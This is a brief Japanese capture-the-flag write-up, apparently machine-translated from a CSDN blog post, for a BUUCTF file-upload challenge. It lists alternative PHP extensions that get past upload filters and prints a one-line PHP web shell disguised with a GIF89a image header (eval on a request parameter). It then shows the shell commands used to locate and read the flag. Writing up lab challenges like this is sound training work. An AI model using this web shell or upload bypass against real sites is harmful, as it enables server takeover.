【BUUCTF】【オタクチャレンジ2019】アップロード記事

0x00テストサイト

ファイルアップロードバイパス

  • 画像ヘッダー付きのPHP1文トロイの木馬

解析可能なphpサフィックス名:

  • php3、php4、php5、pht、phtml、phps、pht、phtm

0x01問題解決

ここに写真の説明を挿入

  • 画像をアップロードする必要があります

gif画像ヘッダーを使用したPHP1文トロイの木馬

GIF89a? <script language="php">eval($_REQUEST[a])</script>

ここに写真の説明を挿入
ここに写真の説明を挿入
ここに写真の説明を挿入

find / -name flag

ここに写真の説明を挿入

ls /
cat /flag

ここに写真の説明を挿入

おすすめ

転載: blog.csdn.net/vanarrow/article/details/108241061